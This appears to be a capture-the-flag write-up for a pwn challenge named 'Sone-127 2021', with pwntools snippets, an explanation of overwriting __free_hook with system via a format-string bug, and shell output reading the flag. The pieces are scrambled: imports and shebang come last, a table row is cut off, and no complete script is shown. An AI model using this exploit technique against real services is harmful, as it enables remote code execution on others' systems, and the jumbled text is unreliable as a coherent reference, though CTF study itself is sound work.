Sone-127 2021

```python
def main():
    io = remote(HOST, PORT)
```

```python
def get_shell(io):
    # Upload a file containing /bin/sh
    io.sendlineafter(b'> ', b'upload sh.txt')
    io.sendlineafter(b'Enter size: ', b'8')
    io.send(b'/bin/sh')
    io.recvuntil(b'> ')
```

```
> upload sh.txt
[uploading 8 bytes]
/bin/sh
```

The service stores the content in a heap chunk. When we later request `download sh.txt`, the binary will free the buffer after sending the content. Because `__free_hook` now points to `system`, `free(buf)` becomes `system(buf)`. Since `buf` points to the string `"/bin/sh"`, we get a shell.

| Function | Purpose |
|----------|---------|
| `leak_libc` | Uses the format‑string to leak a libc address and compute the base. |
| `write_free_hook` | Crafts a two‑write `%hn` payload that stores `system` at `__free_hook`. |
| `get_shell` | Uploads a chunk containing `/bin/sh` and then frees it, invoking `system`. |
| `main` | Orchestrates the steps and drops |

```python
io.sendlineafter(b'> ', b'echo ' + payload)
io.recvuntil(b'> ')  # sync back to prompt
```

```python
HOST = 'sone-127.ctf.example.com'
PORT = 31337
```

```python
# 3️⃣ Get a shell
get_shell(io)
```

```python
from pwn import *
```

```
> download sh.txt
/bin/sh
$ id
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
$ cat /flag.txt
FLAGSONE_127_2021_4c7f5b
```

Success!

```python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
```
